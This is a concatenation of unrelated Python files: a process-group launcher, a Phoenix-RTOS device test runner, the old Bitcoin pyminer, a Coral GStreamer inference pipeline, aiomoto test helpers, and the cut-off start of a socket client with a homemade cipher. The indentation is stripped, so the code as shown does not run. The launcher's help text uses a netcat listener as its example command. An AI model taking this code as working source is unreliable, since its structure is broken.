if __name__ == '__main__':
main()
|
multi-process-launcher.py
|
#!/usr/bin/python3
import argparse
import threading
import subprocess
import sys
import os
import signal
import time
from contextlib import suppress
PROCESS = []
def cli_args():
parser = argparse.ArgumentParser(description='A Python thread/subprocess launcher to group dependent process launches')
parser.add_argument('-c', '--cmd', action='append', required=True, nargs='+', help='Command to run and its arguments as a single string', metavar="\"/usr/bin/nc -l $PORT0\"")
return parser.parse_args()
def cleanup():
for remaining_process in PROCESS[::-1]:
with suppress(Exception):
os.killpg(os.getpgid(remaining_process.pid), signal.SIGTERM)
time.sleep(2)
with suppress(Exception):
os.killpg(os.getpgid(remaining_process.pid), signal.SIGKILL)
os._exit(10)
def handle_exit(_, __):
cleanup()
def exit_callback(cmd_line):
print('PYTHON_START_WRAPPER: %s exited, killing myself and children' % cmd_line, file=sys.stderr)
cleanup()
def run_in_separate_process(exit_callback, cmd_line):
def run_process(exit_callback, cmd_line):
sub_proc = subprocess.Popen(cmd_line, shell=True, preexec_fn=os.setsid, env=os.environ)
PROCESS.append(sub_proc)
print('PYTHON_START_WRAPPER: %s started as %s' % (cmd_line, sub_proc.pid), file=sys.stderr)
sub_proc.wait()
exit_callback()
return
thread = threading.Thread(target=run_process, args=(lambda: exit_callback(cmd_line), cmd_line))
thread.start()
return thread
if __name__ == '__main__':
signal.signal(signal.SIGINT, handle_exit)
signal.signal(signal.SIGTERM, handle_exit)
config = cli_args()
for command in config.cmd:
run_in_separate_process(exit_callback, command)
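# Illustrative invocation (not part of the original script; commands are placeholders):
#   ./multi-process-launcher.py -c "/usr/bin/nc -l 1234" -c "sleep 3600"
# Each command runs in its own process group; if any of them exits, cleanup()
# sends SIGTERM (then SIGKILL after 2 seconds) to the remaining groups and the
# wrapper exits with status 10.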
|
common.py
|
#
# Phoenix-RTOS test runner
#
# Common parts of phoenix-rtos test runners
#
# Copyright 2021 Phoenix Systems
# Authors: Jakub Sarzyński, Mateusz Niewiadomski, Damian Loewnau
#
import importlib
import logging
import os
import signal
import sys
import threading
import time
import pexpect
import pexpect.fdpexpect
import serial
import subprocess
from pathlib import Path
from trunner.config import PHRTOS_PROJECT_DIR
from trunner.tools.color import Color
_BOOT_DIR = PHRTOS_PROJECT_DIR / '_boot'
def rootfs(target: str) -> Path:
return PHRTOS_PROJECT_DIR / '_fs' / target / 'root'
def is_github_actions():
return os.getenv('GITHUB_ACTIONS', False)
def wait_for_dev(port, timeout=0):
asleep = 0
# naive wait for dev
while not os.path.exists(port):
time.sleep(0.01)
asleep += 0.01
if timeout and asleep >= timeout:
raise TimeoutError
def power_usb_ports(enable: bool):
uhubctl = subprocess.run([
'uhubctl',
'-l', '2',
'-a', f'{1 if enable else 0}'],
stdout=subprocess.DEVNULL
)
if uhubctl.returncode != 0:
logging.error('uhubctl failed!\n')
raise Exception('RPi usb ports powering up/down failed!')
def unbind_rpi_usb(port_address):
try:
with open('/sys/bus/usb/drivers/usb/unbind', 'w') as file:
file.write(port_address)
except PermissionError:
logging.error("/sys/bus/usb/drivers/usb/unbind: PermissionError\n\
If You launch test runner locally:\n\
Add 'sudo chmod a+w /sys/bus/usb/drivers/usb/unbind' to /etc/rc.local\n\
If You use Docker:\n\
Set the appropriate permissions\n")
sys.exit(1)
class Psu:
"""Wrapper for psu program"""
def __init__(self, script, cwd=_BOOT_DIR):
self.script = script
self.cwd = cwd
self.proc = None
def read_output(self):
if is_github_actions():
logging.info('::group::Run psu\n')
while True:
line = self.proc.readline()
if not line:
break
logging.info(line)
if is_github_actions():
logging.info('::endgroup::\n')
def run(self):
# Use pexpect.spawn to run a process as PTY, so it will flush on a new line
self.proc = pexpect.spawn(
'psu',
[f'{self.script}'],
cwd=self.cwd,
encoding='utf-8'
)
self.read_output()
self.proc.wait()
if self.proc.exitstatus != 0:
logging.error('psu failed!\n')
raise Exception('Flashing IMXRT106x failed!')
def phd_error_msg(message, output):
msg = message
msg += Color.colorify('\nPHOENIXD OUTPUT:\n', Color.BOLD)
msg += output
return msg
class PhoenixdError(Exception):
pass
class Phoenixd:
""" Wrapper for phoenixd program"""
def __init__(
self,
port,
baudrate=460800,
dir='.',
cwd=_BOOT_DIR,
wait_dispatcher=True
):
self.port = port
self.baudrate = baudrate
self.dir = dir
self.cwd = cwd
self.proc = None
self.reader_thread = None
self.wait_dispatcher = wait_dispatcher
self.dispatcher_event = None
self.output_buffer = ''
def _reader(self):
""" This method is intended to be run as a separated thread. It reads output of proc
line by line and saves it in the output_buffer. Additionally, if wait_dispatcher is true,
it searches for a line stating that message dispatcher has started """
while True:
line = self.proc.readline()
if not line:
break
if self.wait_dispatcher and not self.dispatcher_event.is_set():
msg = f'Starting message dispatcher on [{self.port}] (speed={self.baudrate})'
if msg in line:
self.dispatcher_event.set()
self.output_buffer += line
def run(self):
try:
wait_for_dev(self.port, timeout=10)
except TimeoutError as exc:
raise PhoenixdError(f'couldn\'t find {self.port}') from exc
# Use pexpect.spawn to run a process as PTY, so it will flush on a new line
self.proc = pexpect.spawn(
'phoenixd',
['-p', self.port,
'-b', str(self.baudrate),
'-s', self.dir],
cwd=self.cwd,
encoding='utf-8'
)
self.dispatcher_event = threading.Event()
self.reader_thread = threading.Thread(target=self._reader)
self.reader_thread.start()
if self.wait_dispatcher:
# Reader thread will notify us that message dispatcher has just started
dispatcher_ready = self.dispatcher_event.wait(timeout=5)
if not dispatcher_ready:
self.kill()
msg = 'message dispatcher did not start!'
raise PhoenixdError(msg)
return self.proc
def output(self):
output = self.output_buffer
if is_github_actions():
output = '::group::phoenixd output\n' + output + '\n::endgroup::\n'
return output
def kill(self):
if self.proc.isalive():
os.killpg(os.getpgid(self.proc.pid), signal.SIGTERM)
self.reader_thread.join(timeout=10)
if self.proc.isalive():
os.killpg(os.getpgid(self.proc.pid), signal.SIGKILL)
def __enter__(self):
self.run()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.kill()
class PloError(Exception):
def __init__(self, message, expected):
msg = Color.colorify("PLO ERROR:\n", Color.BOLD)
msg += str(message) + '\n'
if expected:
msg += Color.colorify("EXPECTED:\n", Color.BOLD)
msg += str(expected) + '\n'
super().__init__(msg)
class PloTalker:
"""Interface to communicate with plo"""
def __init__(self, port, baudrate=115200):
self.port = port
self.baudrate = baudrate
self.serial = None
self.plo = None
@classmethod
def from_pexpect(cls, pexpect_fd):
""" PloTalker can be created by passing pexpect spawn object directly.
User should handle port and process by himself. """
obj = cls(port=None)
obj.plo = pexpect_fd
return obj
def open(self):
try:
self.serial = serial.Serial(self.port, baudrate=self.baudrate)
except serial.SerialException:
logging.error(f'Port {self.port} not available\n')
raise
try:
self.plo = pexpect.fdpexpect.fdspawn(self.serial, timeout=8)
except Exception:
self.serial.close()
raise
return self
def close(self):
self.serial.close()
def __enter__(self):
return self.open()
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def wait_prompt(self, timeout=8):
self.plo.expect_exact("(plo)% ", timeout=timeout)
def expect_prompt(self, timeout=8):
idx = self.plo.expect([r"\(plo\)% ", r"(.*?)\n"], timeout=timeout)
if idx == 1:
# Something else than prompt was printed, raise error
line = self.plo.match.group(0)
raise PloError(line, expected="(plo)% ")
def cmd(self, cmd, timeout=8):
self.plo.send(cmd + '\r\n')
# Wait for the echoed command
self.plo.expect_exact(cmd)
# There might be some ASCII escape characters, we wait only for a new line
self.plo.expect_exact('\n', timeout=timeout)
def app(self, device, file, imap, dmap, exec=False):
exec = '-x' if exec else ''
self.cmd(f'app {device} {exec} {file} {imap} {dmap}', timeout=30)
self.expect_prompt()
def copy(self, src, src_obj, dst, dst_obj, src_size='', dst_size=''):
self.cmd(f'copy {src} {src_obj} {src_size} {dst} {dst_obj} {dst_size}', timeout=60)
self.expect_prompt()
def copy_file2mem(self, src, file, dst='flash1', off=0, size=0):
self.copy(
src=src,
src_obj=file,
dst=dst,
dst_obj=off,
dst_size=size
)
def go(self):
self.plo.send('go!\r\n')
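# Illustrative helper, not part of the original runner: a minimal plo session
# sketch. The serial port below is an assumption; PloTalker only needs a device
# that exposes the plo prompt.
def example_plo_session(port='/dev/ttyUSB0'):
    """Open plo on `port`, wait for its prompt and boot the loaded image."""
    with PloTalker(port) as plo:
        plo.wait_prompt()
        plo.go()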
class Runner:
"""Common interface for test runners"""
def flash(self):
"""Method used for flashing a device with the image containing tests."""
pass
def run(self, test):
"""Method used for running a single test case which is represented by TestCase class."""
pass
class DeviceRunner(Runner):
"""This class provides interface to run test case using serial port"""
def __init__(self, serial):
self.serial_port = serial[0]
self.serial_baudrate = serial[1]
self.serial = None
def run(self, test):
if test.skipped():
return
try:
self.serial = serial.Serial(self.serial_port, baudrate=self.serial_baudrate)
except serial.SerialException:
test.handle_exception()
return
proc = pexpect.fdpexpect.fdspawn(self.serial, encoding='utf-8', timeout=test.timeout)
try:
PloTalker.from_pexpect(proc).go()
test.handle(proc)
finally:
self.serial.close()
class GPIO:
"""Wrapper around the RPi.GPIO module. It represents a single OUT pin"""
def __init__(self, pin):
self.pin = pin
self.gpio = importlib.import_module('RPi.GPIO')
self.gpio.setmode(self.gpio.BCM)
self.gpio.setwarnings(False)
self.gpio.setup(self.pin, self.gpio.OUT, initial=self.gpio.LOW)
def high(self):
self.gpio.output(self.pin, self.gpio.HIGH)
def low(self):
self.gpio.output(self.pin, self.gpio.LOW)
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
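# Illustrative CONFIG-FILE contents (key=value per line; the values below are
# examples only, not required defaults):
#   host=127.0.0.1
#   port=8332
#   rpcuser=bitcoinrpc
#   rpcpass=secret
#   threads=4
#   hashmeter=1
#   scantime=30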
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 2332
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
gstreamer.py
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import threading
import time
import numpy as np
import gi
gi.require_version('Gst', '1.0')
gi.require_version('GstBase', '1.0')
gi.require_version('GstVideo', '1.0')
gi.require_version('Gtk', '3.0')
from gi.repository import GLib, GObject, Gst, GstBase, GstVideo, Gtk
Gst.init(None)
class GstPipeline:
def __init__(self, pipeline, inf_callback, render_callback, src_size):
self.inf_callback = inf_callback
self.render_callback = render_callback
self.running = False
self.gstbuffer = None
self.output = None
self.sink_size = None
self.src_size = src_size
self.box = None
self.condition = threading.Condition()
self.pipeline = Gst.parse_launch(pipeline)
self.freezer = self.pipeline.get_by_name('freezer')
self.overlay = self.pipeline.get_by_name('overlay')
self.overlaysink = self.pipeline.get_by_name('overlaysink')
appsink = self.pipeline.get_by_name('appsink')
appsink.connect('new-sample', self.on_new_sample)
# Set up a pipeline bus watch to catch errors.
bus = self.pipeline.get_bus()
bus.add_signal_watch()
bus.connect('message', self.on_bus_message)
# Set up a full screen window on Coral, no-op otherwise.
self.setup_window()
def run(self):
# Start inference worker.
self.running = True
inf_worker = threading.Thread(target=self.inference_loop)
inf_worker.start()
render_worker = threading.Thread(target=self.render_loop)
render_worker.start()
# Run pipeline.
self.pipeline.set_state(Gst.State.PLAYING)
self.pipeline.get_state(Gst.CLOCK_TIME_NONE)
# We're high latency on higher resolutions, don't drop our late frames.
if self.overlaysink:
sinkelement = self.overlaysink.get_by_interface(GstVideo.VideoOverlay)
else:
sinkelement = self.pipeline.get_by_interface(GstVideo.VideoOverlay)
sinkelement.set_property('sync', False)
sinkelement.set_property('qos', False)
try:
Gtk.main()
except:
pass
# Clean up.
self.pipeline.set_state(Gst.State.NULL)
while GLib.MainContext.default().iteration(False):
pass
with self.condition:
self.running = False
self.condition.notify_all()
inf_worker.join()
render_worker.join()
def on_bus_message(self, bus, message):
t = message.type
if t == Gst.MessageType.EOS:
Gtk.main_quit()
elif t == Gst.MessageType.WARNING:
err, debug = message.parse_warning()
sys.stderr.write('Warning: %s: %s\n' % (err, debug))
elif t == Gst.MessageType.ERROR:
err, debug = message.parse_error()
sys.stderr.write('Error: %s: %s\n' % (err, debug))
Gtk.main_quit()
return True
def on_new_sample(self, sink):
sample = sink.emit('pull-sample')
if not self.sink_size:
s = sample.get_caps().get_structure(0)
self.sink_size = (s.get_value('width'), s.get_value('height'))
with self.condition:
self.gstbuffer = sample.get_buffer()
self.condition.notify_all()
return Gst.FlowReturn.OK
def get_box(self):
if not self.box:
glbox = self.pipeline.get_by_name('glbox')
if glbox:
glbox = glbox.get_by_name('filter')
box = self.pipeline.get_by_name('box')
assert glbox or box
assert self.sink_size
if glbox:
self.box = (glbox.get_property('x'), glbox.get_property('y'),
glbox.get_property('width'), glbox.get_property('height'))
else:
self.box = (-box.get_property('left'), -box.get_property('top'),
self.sink_size[0] + box.get_property('left') + box.get_property('right'),
self.sink_size[1] + box.get_property('top') + box.get_property('bottom'))
return self.box
def inference_loop(self):
while True:
with self.condition:
while not self.gstbuffer and self.running:
self.condition.wait()
if not self.running:
break
gstbuffer = self.gstbuffer
self.gstbuffer = None
# Input tensor is expected to be tightly packed, that is,
# width and stride in pixels are expected to be the same.
# For the Coral devboard using GPU this will always be true,
# but when using generic GStreamer CPU based elements the line
# stride will always be a multiple of 4 bytes in RGB format.
# In case of mismatch we have to copy the input line by line.
# For best performance input tensor size should take this
# into account when using CPU based elements.
# TODO: Use padded posenet models to avoid this.
meta = GstVideo.buffer_get_video_meta(gstbuffer)
assert meta and meta.n_planes == 1
bpp = 3 # bytes per pixel.
buf_stride = meta.stride[0] # 0 for first and only plane.
inf_stride = meta.width * bpp
if inf_stride == buf_stride:
# Fast case, pass buffer as input tensor as is.
input_tensor = gstbuffer
else:
# Slow case, need to pack lines tightly (copy).
result, mapinfo = gstbuffer.map(Gst.MapFlags.READ)
assert result
data_view = memoryview(mapinfo.data)
input_tensor = bytearray(inf_stride * meta.height)
src_offset = dst_offset = 0
for row in range(meta.height):
src_end = src_offset + inf_stride
dst_end = dst_offset + inf_stride
input_tensor[dst_offset : dst_end] = data_view[src_offset : src_end]
src_offset += buf_stride
dst_offset += inf_stride
input_tensor = bytes(input_tensor)
gstbuffer.unmap(mapinfo)
output = self.inf_callback(input_tensor)
with self.condition:
self.output = output
self.condition.notify_all()
def render_loop(self):
while True:
with self.condition:
while not self.output and self.running:
self.condition.wait()
if not self.running:
break
output = self.output
self.output = None
svg, freeze = self.render_callback(output, self.src_size, self.get_box())
self.freezer.frozen = freeze
if self.overlaysink:
self.overlaysink.set_property('svg', svg)
elif self.overlay:
self.overlay.set_property('data', svg)
def setup_window(self):
# Only set up our own window if we have Coral overlay sink in the pipeline.
if not self.overlaysink:
return
gi.require_version('GstGL', '1.0')
from gi.repository import GstGL
# Needed to commit the wayland sub-surface.
def on_gl_draw(sink, widget):
widget.queue_draw()
# Needed to account for window chrome etc.
def on_widget_configure(widget, event, overlaysink):
allocation = widget.get_allocation()
overlaysink.set_render_rectangle(allocation.x, allocation.y,
allocation.width, allocation.height)
return False
window = Gtk.Window(Gtk.WindowType.TOPLEVEL)
window.fullscreen()
drawing_area = Gtk.DrawingArea()
window.add(drawing_area)
drawing_area.realize()
self.overlaysink.connect('drawn', on_gl_draw, drawing_area)
# Wayland window handle.
wl_handle = self.overlaysink.get_wayland_window_handle(drawing_area)
self.overlaysink.set_window_handle(wl_handle)
# Wayland display context wrapped as a GStreamer context.
wl_display = self.overlaysink.get_default_wayland_display_context()
self.overlaysink.set_context(wl_display)
drawing_area.connect('configure-event', on_widget_configure, self.overlaysink)
window.connect('delete-event', Gtk.main_quit)
window.show_all()
# The appsink pipeline branch must use the same GL display as the screen
# rendering so they get the same GL context. This isn't automatically handled
# by GStreamer as we're the ones setting an external display handle.
def on_bus_message_sync(bus, message, overlaysink):
if message.type == Gst.MessageType.NEED_CONTEXT:
_, context_type = message.parse_context_type()
if context_type == GstGL.GL_DISPLAY_CONTEXT_TYPE:
sinkelement = overlaysink.get_by_interface(GstVideo.VideoOverlay)
gl_context = sinkelement.get_property('context')
if gl_context:
display_context = Gst.Context.new(GstGL.GL_DISPLAY_CONTEXT_TYPE, True)
GstGL.context_set_gl_display(display_context, gl_context.get_display())
message.src.set_context(display_context)
return Gst.BusSyncReply.PASS
bus = self.pipeline.get_bus()
bus.set_sync_handler(on_bus_message_sync, self.overlaysink)
def on_bus_message(bus, message, loop):
t = message.type
if t == Gst.MessageType.EOS:
loop.quit()
elif t == Gst.MessageType.WARNING:
err, debug = message.parse_warning()
sys.stderr.write('Warning: %s: %s\n' % (err, debug))
elif t == Gst.MessageType.ERROR:
err, debug = message.parse_error()
sys.stderr.write('Error: %s: %s\n' % (err, debug))
loop.quit()
return True
def detectCoralDevBoard():
try:
if 'MX8MQ' in open('/sys/firmware/devicetree/base/model').read():
print('Detected Edge TPU dev board.')
return True
except:
pass
return False
class Freezer(GstBase.BaseTransform):
__gstmetadata__ = ('<longname>', '<class>', '<description>', '<author>')
__gsttemplates__ = (Gst.PadTemplate.new('sink',
Gst.PadDirection.SINK,
Gst.PadPresence.ALWAYS,
Gst.Caps.new_any()),
Gst.PadTemplate.new('src',
Gst.PadDirection.SRC,
Gst.PadPresence.ALWAYS,
Gst.Caps.new_any())
)
def __init__(self):
self.buf = None
self.frozen = False
self.set_passthrough(False)
def do_prepare_output_buffer(self, inbuf):
if self.frozen:
if not self.buf:
self.buf = inbuf
src_buf = self.buf
else:
src_buf = inbuf
buf = Gst.Buffer.new()
buf.copy_into(src_buf, Gst.BufferCopyFlags.FLAGS | Gst.BufferCopyFlags.TIMESTAMPS |
Gst.BufferCopyFlags.META | Gst.BufferCopyFlags.MEMORY, 0, inbuf.get_size())
buf.pts = inbuf.pts
return (Gst.FlowReturn.OK, buf)
def do_transform(self, inbuf, outbuf):
return Gst.FlowReturn.OK
def register_elements(plugin):
gtype = GObject.type_register(Freezer)
Gst.Element.register(plugin, 'freezer', 0, gtype)
return True
Gst.Plugin.register_static(
Gst.version()[0], Gst.version()[1], # GStreamer version
'', # name
'', # description
register_elements, # init_func
'', # version
'unknown', # license
'', # source
'', # package
'' # origin
)
def run_pipeline(inf_callback, render_callback, src_size,
inference_size,
mirror=False,
h264=False,
jpeg=False,
videosrc='/dev/video0'):
if h264:
SRC_CAPS = 'video/x-h264,width={width},height={height},framerate=30/1'
elif jpeg:
SRC_CAPS = 'image/jpeg,width={width},height={height},framerate=30/1'
else:
SRC_CAPS = 'video/x-raw,width={width},height={height},framerate=30/1'
PIPELINE = 'v4l2src device=%s ! {src_caps}'%videosrc
if detectCoralDevBoard():
scale_caps = None
PIPELINE += """ ! decodebin ! glupload ! glvideoflip video-direction={direction} ! tee name=t
t. ! {leaky_q} ! freezer name=freezer ! glsvgoverlaysink name=overlaysink
t. ! {leaky_q} ! glfilterbin filter=glbox name=glbox ! {sink_caps} ! {sink_element}
"""
else: # raspberry pi or linux
scale = min(inference_size[0] / src_size[0], inference_size[1] / src_size[1])
scale = tuple(int(x * scale) for x in src_size)
scale_caps = 'video/x-raw,width={width},height={height}'.format(width=scale[0], height=scale[1])
PIPELINE += """ ! decodebin ! videoflip video-direction={direction} ! tee name=t
t. ! {leaky_q} ! videoconvert ! freezer name=freezer ! rsvgoverlay name=overlay
! videoconvert ! autovideosink
t. ! {leaky_q} ! videoconvert ! videoscale ! {scale_caps} ! videobox name=box autocrop=true
! {sink_caps} ! {sink_element}
"""
SINK_ELEMENT = 'appsink name=appsink emit-signals=true max-buffers=1 drop=true'
SINK_CAPS = 'video/x-raw,format=RGB,width={width},height={height}'
LEAKY_Q = 'queue max-size-buffers=1 leaky=downstream'
direction = 'horiz' if mirror else 'identity'
src_caps = SRC_CAPS.format(width=src_size[0], height=src_size[1])
sink_caps = SINK_CAPS.format(width=inference_size[0], height=inference_size[1])
pipeline = PIPELINE.format(src_caps=src_caps, sink_caps=sink_caps,
sink_element=SINK_ELEMENT, direction=direction, leaky_q=LEAKY_Q, scale_caps=scale_caps)
print('Gstreamer pipeline: ', pipeline)
pipeline = GstPipeline(pipeline, inf_callback, render_callback, src_size)
pipeline.run()
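# Illustrative call, not part of this module; the callbacks and sizes below are
# placeholder assumptions. run_pipeline() blocks in Gtk.main() until the window
# is closed or EOS/error is reached. inf_callback receives the packed RGB input
# tensor and its return value is passed to render_callback, which must return
# an (svg, freeze) tuple:
#   run_pipeline(my_inference_callback, my_render_callback,
#                src_size=(640, 480), inference_size=(641, 481))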
|
aiomoto_services.py
|
# Copyright 2019-2022 Darren Weber
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import functools
import threading
import time
import aiohttp
from pytest_aiomoto.moto_services import CONNECT_TIMEOUT
from pytest_aiomoto.moto_services import MotoService
class AioMotoService(MotoService):
"""Will Create AioMotoService.
Service is ref-counted so there will only be one per process. Real Service will
be returned by `__aenter__`."""
def __call__(self, func):
# override on this prevents any use of this class as a synchronous server
async def wrapper(*args, **kwargs):
await self._aio_start()
try:
result = await func(*args, **kwargs)
finally:
await self._aio_stop()
return result
functools.update_wrapper(wrapper, func)
wrapper.__wrapped__ = func
return wrapper
async def __aenter__(self):
svc = self._services.get(self._service_name)
if svc is None:
self._services[self._service_name] = self
self._refcount = 1
await self._aio_start()
return self
else:
svc._refcount += 1
return svc
async def __aexit__(self, exc_type, exc_val, exc_tb):
self._refcount -= 1
if self._socket:
self._socket.close()
self._socket = None
if self._refcount == 0:
del self._services[self._service_name]
await self._aio_stop()
async def _aio_start(self):
self._thread = threading.Thread(target=self._server_entry, daemon=True)
self._thread.start()
async with aiohttp.ClientSession() as session:
start = time.time()
while time.time() - start < 10:
if not self._thread.is_alive():
break
try:
# we need to bypass the proxies due to monkeypatches
async with session.get(
self.endpoint_url + "/static", timeout=CONNECT_TIMEOUT
):
pass
break
except (asyncio.TimeoutError, aiohttp.ClientConnectionError):
await asyncio.sleep(0.2)
else:
await self._aio_stop() # pytest.fail doesn't call stop_process
raise Exception(
"Cannot start AioMotoService: {}".format(self._service_name)
)
async def _aio_stop(self):
if self._server:
self._server.shutdown()
self._thread.join()
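# Illustrative usage sketch, not part of this module. Constructor arguments
# follow the inherited MotoService; the service name below is an assumption:
#
#   async def example():
#       async with AioMotoService("s3") as svc:
#           ...  # talk to the local moto server at svc.endpoint_url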
|
client.py
|
#!/usr/bin/env python3
import socket
import re
import threading
import time
import select
import subprocess
from _thread import *
def encrypt(text,s):
result = ""
# traverse text
for i in range(len(text)):
char = text[i]
# Encrypt uppercase characters
if (char.isupper()):
result += chr((ord(char) + s-65) % 26 + 65)
# Encrypt lowercase characters
elif(char.islower()):
result += chr((ord(char) + s - 97) % 26 + 97)
elif(char == '\n'):
result += chr(1500)
elif(char == '.'):
result += chr(2000)
elif(char == '-'):
result += chr(2001)
elif(char == '/'):
result += chr(2002)
else:
result += chr(3000)
return result
def decrypt(text,s):
s= 26-s
result = ""
# traverse text
for i in range(len(text)):
char = text[i]
# Encrypt uppercase characters
if (char.isupper()):
result += chr((ord(char) + s-65) % 26 + 65)
# Encrypt lowercase characters
elif(char.islower()):
result += chr((ord(char) + s - 97) % 26 + 97)
elif(char == chr(1500)):
result += "\n"
elif(char == chr(2000)):
result += "."
elif(char == chr(2001)):
result += "-"
elif(char == chr(2002)):
result += "/"
else:
result += " "
return result
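# Illustrative round-trip of the scheme above (comment only, not original code):
#   encrypt("Hello-World", 3) shifts letters by 3 and maps '-' to chr(2001),
#   giving "Khoor" + chr(2001) + "Zruog", and
#   decrypt(encrypt("Hello-World", 3), 3) == "Hello-World"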
def get_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
except:
IP = '127.0.0.1'
finally:
s.close()
return IP
#### -----------IP & PORT -------------####
signal_strength = 0
